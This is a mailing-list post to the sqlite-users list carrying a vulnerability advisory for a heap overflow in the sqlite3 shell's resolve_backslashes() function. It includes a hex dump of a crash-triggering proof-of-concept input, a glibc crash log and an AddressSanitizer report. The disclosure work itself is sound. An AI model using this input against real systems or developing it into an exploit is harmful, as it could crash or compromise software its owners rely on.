Dear Sqlite team,
I hope this email finds you well.
I'd like to report a heap overflow, please find an advisory attached to
this email.
Best regards,
j-
---------------------------------------------------------------------------
* *
* Sqlite3 heap overflow vulnerability *
* *
---------------------------------------------------------------------------
--[ Vulnerability summary:
Date reported to vendor: 27 May 2016
CVE : Not yet
Class: Heap overflow
--[ Synopsis:
A heap overflow has been identified in sqlite3.
Version tested : 3.8.9 2015-03-23 21:32:50
0ee2d38deb35aefc55395e86984a9a773caf6218
--[ Vulnerability details:
The resolve_backslashes() function is subject to a heap corruption
vulnerability
when parsing an allocated looking for a back slash. The application starts
by reading
the corresponding value (possibly after the end of a valid heap chunk), and
then repaces
it, potentially leading to a heap corruption.
--[ Exploitability:
The vulnerability can consistently be triggered using the PoC reproduced
below.
Successfull exploitation is heap allocator dependant.
--[ Timeline:
27 May 2016 : Vulnerability reported to vendor.
--[ PoC:
jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc1.txt
0000000: 2e20 696e 0a2e 6920 697b 0a2e 696e 0a2e . in..i i{..in..
0000010: 2078 1445 434c 5372 7328 aa6f 0000 036e x.ECLSrs(.o...n
0000020: 0a2e 2078 1445 434c 5372 5c .. x.ECLSr\
jbrossard@jbrossard-wsl3:~$
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ sqlite3 <
/tmp/poc/poc1.txt
Error: unknown command or invalid arguments: "x�ECLSrs(�o.". Enter ".help"
for help
*** glibc detected *** sqlite3: free(): invalid next size (fast):
0x000000000104bd50 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7db26)[0x7f5e8bc0eb26]
sqlite3[0x40528a]
sqlite3[0x402709]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7f5e8bbb276d]
sqlite3[0x40299d]
======= Memory map: ========
00400000-0040b000 r-xp 00000000 fc:01 1708692
/usr/bin/sqlite3
0060a000-0060b000 r--p 0000a000 fc:01 1708692
/usr/bin/sqlite3
0060b000-0060c000 rw-p 0000b000 fc:01 1708692
/usr/bin/sqlite3
01033000-01054000 rw-p 00000000 00:00 0 [heap]
7f5e8acd0000-7f5e8ace6000 r-xp 00000000 fc:01 2493899
/lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8ace6000-7f5e8aee5000 ---p 00016000 fc:01 2493899
/lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee5000-7f5e8aee6000 r--p 00015000 fc:01 2493899
/lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee6000-7f5e8aee7000 rw-p 00016000 fc:01 2493899
/lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee7000-7f5e8aefe000 r-xp 00000000 fc:01 2504371
/lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8aefe000-7f5e8b0fd000 ---p 00017000 fc:01 2504371
/lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0fd000-7f5e8b0fe000 r--p 00016000 fc:01 2504371
/lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0fe000-7f5e8b0ff000 rw-p 00017000 fc:01 2504371
/lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0ff000-7f5e8b101000 rw-p 00000000 00:00 0
7f5e8b101000-7f5e8b119000 r-xp 00000000 fc:01 2498365
/lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b119000-7f5e8b319000 ---p 00018000 fc:01 2498365
/lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b319000-7f5e8b31a000 r--p 00018000 fc:01 2498365
/lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b31a000-7f5e8b31b000 rw-p 00019000 fc:01 2498365
/lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b31b000-7f5e8b31d000 rw-p 00000000 00:00 0
7f5e8b31d000-7f5e8b348000 r-xp 00000000 fc:01 2494807
/lib/libnss_centrifydc.so.2
7f5e8b348000-7f5e8b547000 ---p 0002b000 fc:01 2494807
/lib/libnss_centrifydc.so.2
7f5e8b547000-7f5e8b549000 rw-p 0002a000 fc:01 2494807
/lib/libnss_centrifydc.so.2
7f5e8b549000-7f5e8b56b000 r-xp 00000000 fc:01 2490475
/lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b56b000-7f5e8b76b000 ---p 00022000 fc:01 2490475
/lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b76b000-7f5e8b76f000 r--p 00022000 fc:01 2490475
/lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b76f000-7f5e8b770000 rw-p 00026000 fc:01 2490475
/lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b770000-7f5e8b772000 r-xp 00000000 fc:01 2493944
/lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b772000-7f5e8b972000 ---p 00002000 fc:01 2493944
/lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b972000-7f5e8b973000 r--p 00002000 fc:01 2493944
/lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b973000-7f5e8b974000 rw-p 00003000 fc:01 2493944
/lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b974000-7f5e8b98c000 r-xp 00000000 fc:01 2504418
/lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8b98c000-7f5e8bb8b000 ---p 00018000 fc:01 2504418
/lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8b000-7f5e8bb8c000 r--p 00017000 fc:01 2504418
/lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8c000-7f5e8bb8d000 rw-p 00018000 fc:01 2504418
/lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8d000-7f5e8bb91000 rw-p 00000000 00:00 0
7f5e8bb91000-7f5e8bd45000 r-xp 00000000 fc:01 2498744
/lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bd45000-7f5e8bf44000 ---p 001b4000 fc:01 2498744
/lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf44000-7f5e8bf48000 r--p 001b3000 fc:01 2498744
/lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf48000-7f5e8bf4a000 rw-p 001b7000 fc:01 2498744
/lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf4a000-7f5e8bf4f000 rw-p 00000000 00:00 0
7f5e8bf4f000-7f5e8bf88000 r-xp 00000000 fc:01 2490611
/lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8bf88000-7f5e8c188000 ---p 00039000 fc:01 2490611
/lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c188000-7f5e8c18a000 r--p 00039000 fc:01 2490611
/lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c18a000-7f5e8c190000 rw-p 0003b000 fc:01 2490611
/lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c190000-7f5e8c191000 rw-p 00000000 00:00 0
7f5e8c191000-7f5e8c22f000 r-xp 00000000 fc:01 1710926
/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c22f000-7f5e8c42f000 ---p 0009e000 fc:01 1710926
/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c42f000-7f5e8c431000 r--p 0009e000 fc:01 1710926
/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c431000-7f5e8c433000 rw-p 000a0000 fc:01 1710926
/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c433000-7f5e8c434000 rw-p 00000000 00:00 0
7f5e8c434000-7f5e8c456000 r-xp 00000000 fc:01 2508685
/lib/x86_64-linux-gnu/ld-2.15.so
7f5e8c629000-7f5e8c62e000 rw-p 00000000 00:00 0
7f5e8c652000-7f5e8c656000 rw-p 00000000 00:00 0
7f5e8c656000-7f5e8c657000 r--p 00022000 fc:01 2508685
/lib/x86_64-linux-gnu/ld-2.15.so
7f5e8c657000-7f5e8c659000 rw-p 00023000 fc:01 2508685
/lib/x86_64-linux-gnu/ld-2.15.so
7ffebc726000-7ffebc747000 rw-p 00000000 00:00 0 [stack]
7ffebc761000-7ffebc763000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
[vsyscall]
Aborted (core dumped)
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan < /tmp/poc/poc1.txt
Usage: .import FILE TABLE
=================================================================
==2443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf30032ec at
pc 0x806573c bp 0xffdd5d58 sp 0xffdd5d4c
READ of size 1 at 0xf30032ec thread T0
#0 0x806573b in resolve_backslashes
/home/jbrossard/lab/sqlite3/build/../src/shell.c:1946
#1 0x8083183 in do_meta_command
/home/jbrossard/lab/sqlite3/build/../src/shell.c:2614
#2 0x80967a8 in process_input
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
#3 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
#4 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
#5 0x8065148
(/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)
0xf30032ec is located 0 bytes to the right of 300-byte region
[0xf30031c0,0xf30032ec)
allocated by thread T0 here:
#0 0xf72b7654 in __interceptor_realloc
../../../../../libsanitizer/asan/asan_malloc_linux.cc:93
#1 0x806c16b in local_getline
/home/jbrossard/lab/sqlite3/build/../src/shell.c:451
#2 0x8095a7c in one_input_line
/home/jbrossard/lab/sqlite3/build/../src/shell.c:491
#3 0x8095a7c in process_input
/home/jbrossard/lab/sqlite3/build/../src/shell.c:4060
#4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
#5 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/jbrossard/lab/sqlite3/build/../src/shell.c:1946 resolve_backslashes
Shadow bytes around the buggy address:
0x3e600600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e600610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e600620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e600630: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x3e600640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x3e600650: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
0x3e600660: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x3e600670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x3e600680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x3e600690: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x3e6006a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==2443==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
